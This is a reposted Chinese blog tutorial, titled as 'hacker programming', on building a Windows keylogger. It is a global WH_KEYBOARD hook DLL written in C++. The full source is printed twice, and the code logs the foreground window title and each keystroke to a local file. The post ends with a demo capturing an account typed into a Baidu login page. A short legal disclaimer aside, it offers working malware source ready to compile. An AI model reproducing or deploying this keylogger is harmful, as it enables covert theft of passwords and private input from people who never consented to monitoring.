热门标签
热门文章
- 1conda安装gcc方法_conda 安装gcc
- 2Node.js基础---Express
- 3强化学习 PPO算法和代码_ppo算法参数
- 4Linux删除文件和目录
- 5UE5渲染视频教程推荐
- 6Secrets of Self-Made Millionaires, Adam Khoo 读书笔记_secrets of size
- 7两种方法教你在postman设置请求里带动态token_postman带token发请求
- 8给出两个整数a和b, 求他们的和, 但不能使用 + 等数学运算符。_int aplusb(int a, int b)
- 9python --Matplotlib详解_python matplotlib
- 10Python由浅入深学习路线笔记_python练习从浅入深
当前位置: article > 正文
C++黑客编程:键盘记录器,HOOK技术实现
作者:羊村懒王 | 2024-02-28 16:59:22
赞
踩
c++黑客编程
有一种技术被称为HOOK,人们习惯上叫做钩子。钩子技术的应用范围比较广:输入监控,API拦截,消息捕获等等。
今天我们来做的是键盘记录器
编译工具:visual studio 2019
编程语言:自然是C++,Python做的我会写个标题“C++”吗?
编程技术:HOOK
另外我说一下:
中华人民共和国《网络安全法》规定了:任何窃取他人信息都是违法的!本文仅供技术参考,若有人使用本文技术非法窃取他人信息,作者不承担任何法律责任!
HOOK技术分为好几种,我今天介绍一种:Windows钩子
Windows钩子又分为全局钩子和局部钩子.局部钩子是针对一个线程的,而全局钩子就针对整个操作系统.所以需要DLL文件来支持.
打开visual studio 2019,创建新项目->动态链接库(DLL),如图:
这个是我们要用到的函数SetWindowsHookEx(),定义如下
HHOOK SetWindowsHookEx(
In int idHook,
In HOOKPROC lpfn,
In_opt HINSTANCE hmod,
In DWORD dwThreadId);
来说说SetWindowsHookEx()的参数:
idHook:钩子的类型,我们要用的就是WH_KEYBOARD
lpfn:制定钩子函数地址,我们需要写一个函数
hmod:模块句柄
dwThreadId:表示需要被HOOK的线程ID号,如果为0的话就所有的线程都HOOK
UnhookWindowsHookEx()卸载钩子,定义如下
BOOL UnhookWindowsHookEx( In HHOOK hhk);
hhk:钩子句柄
开始实战!!!
首先导出两个函数
extern "C" _declspec(dllexport) BOOL SetHookOn();
extern "C" _declspec(dllexport) BOOL SetHookOff();
- 1
- 2
初始化,注意DllMain()不是DLLMain(),很多大佬都犯
HHOOK g_keyHook = NULL;
HINSTANCE g_Inst = NULL;
LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam);
BOOL APIENTRY DllMain( HMODULE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
g_Inst = (HINSTANCE)hModule;
return TRUE;
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
开启钩子函数
BOOL SetHookOn()
{
g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"键盘HOOK"), 0);
if (g_keyHook)
{
return TRUE;
}
return FALSE;
}
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
卸载钩子函数
BOOL SetHookOff()
{
return UnhookWindowsHookEx(g_keyHook);
}
- 1
- 2
- 3
- 4
键盘钩子函数,前面是获取窗口的标题
LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) { HWND hWnd = GetForegroundWindow(); DWORD dwProcess; LRESULT result = 0; DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess); WCHAR wszProcessPath[MAX_PATH] = { 0 }; DWORD dwSize = MAX_PATH; QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize); CHAR wszTitle[MAX_PATH] = { 0 }; result = GetWindowTextA(hWnd, wszTitle, MAX_PATH); FILE* fp = fopen("文件路径", "a"); if (fp == NULL) return CallNextHookEx(g_keyHook, code, wParam, lParam); if (lParam & 0x40000000) { return CallNextHookEx(g_keyHook, code, wParam, lParam); } if (code == HC_NOREMOVE || code < 0) { return CallNextHookEx(g_keyHook, code, wParam, lParam); } char szkeyName[100] = { 0 }; GetKeyNameTextA(lParam, szkeyName, 100); fwrite(wszTitle, 1, strlen(wszTitle), fp); fwrite("\t", 1, 2, fp); fwrite(szkeyName, 1, strlen(szkeyName), fp); fwrite("\r\n", 1, 2, fp); fclose(fp); return CallNextHookEx(g_keyHook, code, wParam, lParam); }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
我在fopen()的第一个参数下没有写文件路径,你们自己创建一个txt文件,写上路径
完整代码
#include "pch.h" #include <stdio.h> #pragma warning(disable:4996) extern "C" _declspec(dllexport) BOOL SetHookOn(); extern "C" _declspec(dllexport) BOOL SetHookOff(); HHOOK g_keyHook = NULL; HINSTANCE g_Inst = NULL; LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam); BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { g_Inst = (HINSTANCE)hModule; return TRUE; } BOOL SetHookOn() { g_keyHook = SetWindowsHookEx(WH_KEYBOARD, KeyboardProc, GetModuleHandle(L"键盘HOOK"), 0); if (g_keyHook) { return TRUE; } return FALSE; } BOOL SetHookOff() { return UnhookWindowsHookEx(g_keyHook); } LRESULT CALLBACK KeyboardProc(int code,WPARAM wParam,LPARAM lParam) { HWND hWnd = GetForegroundWindow(); DWORD dwProcess; LRESULT result = 0; DWORD dwPID = GetWindowThreadProcessId(hWnd, &dwProcess); HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwProcess); WCHAR wszProcessPath[MAX_PATH] = { 0 }; DWORD dwSize = MAX_PATH; QueryFullProcessImageNameW(hProcess, 0, wszProcessPath, &dwSize); CHAR wszTitle[MAX_PATH] = { 0 }; result = GetWindowTextA(hWnd, wszTitle, MAX_PATH); FILE* fp = fopen("", "a"); if (fp == NULL) return CallNextHookEx(g_keyHook, code, wParam, lParam); if (lParam & 0x40000000) { return CallNextHookEx(g_keyHook, code, wParam, lParam); } if (code == HC_NOREMOVE || code < 0) { return CallNextHookEx(g_keyHook, code, wParam, lParam); } char szkeyName[100] = { 0 }; GetKeyNameTextA(lParam, szkeyName, 100); fwrite(wszTitle, 1, strlen(wszTitle), fp); fwrite("\t", 1, 2, fp); fwrite(szkeyName, 1, strlen(szkeyName), fp); fwrite("\r\n", 1, 2, fp); fclose(fp); return CallNextHookEx(g_keyHook, code, wParam, lParam); }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
生成一个lib和dll文件
创建一个MFC项目,弄两个按钮,…
项目展示:
我在百度登录网站上输入账号:12345,然后按了一下大写(Caps),然后输入ABCD
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/羊村懒王/article/detail/160339
推荐阅读
相关标签
